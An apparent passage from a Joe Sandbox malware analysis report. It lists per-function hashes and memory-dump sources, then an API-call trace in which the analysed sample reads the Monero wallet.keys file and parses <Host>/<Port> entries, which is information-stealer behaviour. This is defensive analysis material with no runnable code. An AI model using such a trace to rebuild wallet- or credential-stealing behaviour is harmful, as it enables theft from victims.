                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: a<<
                  • API String ID: 0-681667818
                  • Opcode ID: ad0452038c9ea7969699009a2f605863f572d34ba8fd86636c97d248251c6ab7
                  • Instruction ID: 35adcc6fa557219fd428c8b08478c337d6fdc9c0a9874c8616106dcc5bc98eec
                  • Opcode Fuzzy Hash: ad0452038c9ea7969699009a2f605863f572d34ba8fd86636c97d248251c6ab7
                  • Instruction Fuzzy Hash: 267158F390C3089FE3047E29ECC577ABBD9EBA4320F16463DD6D483B84E97959058686
                  Function 00516553 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: wf|
                  • API String ID: 0-4182842262
                  • Opcode ID: 11b79c31db2308c480e619092b5a3275f040b07737c7d617cc46c0e4ffd2a112
                  • Instruction ID: 8f95728a68e27d9dc6f06b0e68d4be0ab9eaf3b5cc6927efd20f6dec0a16ab38
                  • Opcode Fuzzy Hash: 11b79c31db2308c480e619092b5a3275f040b07737c7d617cc46c0e4ffd2a112
                  • Instruction Fuzzy Hash: 7941DDF3A182145BE3006D3DEC81766B7DAEBD5271F6B423EE280C7784ED75480A8292
                  Function 0052D1C5 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: |1]4
                  • API String ID: 0-195401779
                  • Opcode ID: 832fc818426a694c616dcc55aa8449a33e95fdd5102a69477578864619780326
                  • Instruction ID: 0c4ac9bf79d4611806ff27378c0b6d8712ed68e1b69b719c43c17450eac1959b
                  • Opcode Fuzzy Hash: 832fc818426a694c616dcc55aa8449a33e95fdd5102a69477578864619780326
                  • Instruction Fuzzy Hash: 1551F4B3E043145BE3449E38DC8436AB7D5EF94720F1A863DDE8853B84D9399D0487C6
                  Function 005F0296 Relevance: .2, Instructions: 219COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 26d8d2ae4e568a8ec3b521cbc989b123bf3a712707c6118c15fd7e709e12f4fc
                  • Instruction ID: e2c1761f6a1a9b2bb92cb4076c79f761b7720704722378e1f4b9c9be8df1ba87
                  • Opcode Fuzzy Hash: 26d8d2ae4e568a8ec3b521cbc989b123bf3a712707c6118c15fd7e709e12f4fc
                  • Instruction Fuzzy Hash: 677103F3D082109BE314AE2DD84536AFBE5EF94720F1B893DEAC993784E9355C4486C6
                  Function 005D1F28 Relevance: .2, Instructions: 213COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 728be585ac110ef61495a5ae9f44ac81814e3731a346c08a62b4967c7c75e028
                  • Instruction ID: 1242ac342e5d3d25561a42ba96bdc13928107c9f4a87062fb1b61afca4968431
                  • Opcode Fuzzy Hash: 728be585ac110ef61495a5ae9f44ac81814e3731a346c08a62b4967c7c75e028
                  • Instruction Fuzzy Hash: 496138F3A083045FF3146E29EC8577AFBD6EBD4310F2A863DDAC447784E97958098296
                  Function 005C16D6 Relevance: .2, Instructions: 194COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c19c41f0ecd5d4ef52d89774c8b572e70041068db59c2551493087ef84628558
                  • Instruction ID: 16cce31aab4d63647c69c44702a629a1cc0cc143e858221f91a9a20ce029c4be
                  • Opcode Fuzzy Hash: c19c41f0ecd5d4ef52d89774c8b572e70041068db59c2551493087ef84628558
                  • Instruction Fuzzy Hash: BD5108F3A0C2046FF341AA2DEC8477AB7D9EBD4360F1A853DE6C4C3744E93958158692
                  Function 0065935A Relevance: .2, Instructions: 192COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 895f41e430784629317b7a0281af3ebceb393535d13fc5e249cd6abfc1c41cf7
                  • Instruction ID: 445a85bc110ec5c4f4db4746a5e560d142a41b0596baf5d95a246f4c1ca87d5a
                  • Opcode Fuzzy Hash: 895f41e430784629317b7a0281af3ebceb393535d13fc5e249cd6abfc1c41cf7
                  • Instruction Fuzzy Hash: D25157F3E055044BF7005D39DC487BABB97DBD4320F2B853DDA8487784ED79990A8282
                  Function 006E5B49 Relevance: .2, Instructions: 172COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9eafedb807c6195f28d694e7b3e127147cca7b83055f8516bc09869cf28695c6
                  • Instruction ID: 7b69f5c4360ff36b7d6d498832e9d1e83d28671c0ff12393ab259cd58b861d7d
                  • Opcode Fuzzy Hash: 9eafedb807c6195f28d694e7b3e127147cca7b83055f8516bc09869cf28695c6
                  • Instruction Fuzzy Hash: 0E51E6B250EB44DFD300AE1ACC9963AB7E6EF94718F36482DE6C787340E63098529747
                  Function 0057155B Relevance: .2, Instructions: 161COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82234411121757cef86c69e23ef163ac8fbd2aaadf9316c9bcba9fdf773f747b
                  • Instruction ID: 85c2c6cc87d7bb881176357c6553384c50a97f9dca895af2151b40dbd7dcb4b6
                  • Opcode Fuzzy Hash: 82234411121757cef86c69e23ef163ac8fbd2aaadf9316c9bcba9fdf773f747b
                  • Instruction Fuzzy Hash: FE4148F3A182145BF308AA29DC4177BB7DAEBD0720F1AC53DE9C593B44D9395C028683
                  Function 0054AA5D Relevance: .2, Instructions: 157COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2b4a598530f41ec0e40e96c00b892618f9fa019055aed73a6dbe94b091626137
                  • Instruction ID: bef3b76df92bd5a5be2b9c4dda7c14adb7f98d048302c305cfa31437cb43836b
                  • Opcode Fuzzy Hash: 2b4a598530f41ec0e40e96c00b892618f9fa019055aed73a6dbe94b091626137
                  • Instruction Fuzzy Hash: 6741EBB3B0C2045FF300AA69EC44B7BB7DAEBD4720F16853DE584C7740EE7998058656
                  Function 005FF3A5 Relevance: .2, Instructions: 152COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 83da5ae05401ce691a1e27998ee501f91eb4b05236dc97fe5154727d656cac4f
                  • Instruction ID: 09194e2b1d8b8f9df305a975204a3443472308e67e59f31b86bff8d8e0c7010b
                  • Opcode Fuzzy Hash: 83da5ae05401ce691a1e27998ee501f91eb4b05236dc97fe5154727d656cac4f
                  • Instruction Fuzzy Hash: 0F418BB3E041148BE7085E3EDD1937ABA96ABC4320F2B463DDAD597380D939090A8792
                  Function 002B9750 Relevance: .0, Instructions: 15COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                  • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                  • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                  Function 002B0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002A99EC
                    • Part of subcall function 002A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 002A9A11
                    • Part of subcall function 002A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 002A9A31
                    • Part of subcall function 002A99C0: ReadFile.KERNEL32(000000FF,?,00000000,002A148F,00000000), ref: 002A9A5A
                    • Part of subcall function 002A99C0: LocalFree.KERNEL32(002A148F), ref: 002A9A90
                    • Part of subcall function 002A99C0: CloseHandle.KERNEL32(000000FF), ref: 002A9A9A
                    • Part of subcall function 002B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 002B8E52
                  • GetProcessHeap.KERNEL32(00000000,000F423F,002C0DBA,002C0DB7,002C0DB6,002C0DB3), ref: 002B0362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B0369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 002B0385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B0393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 002B03CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,002C0DB2), ref: 002B03DD
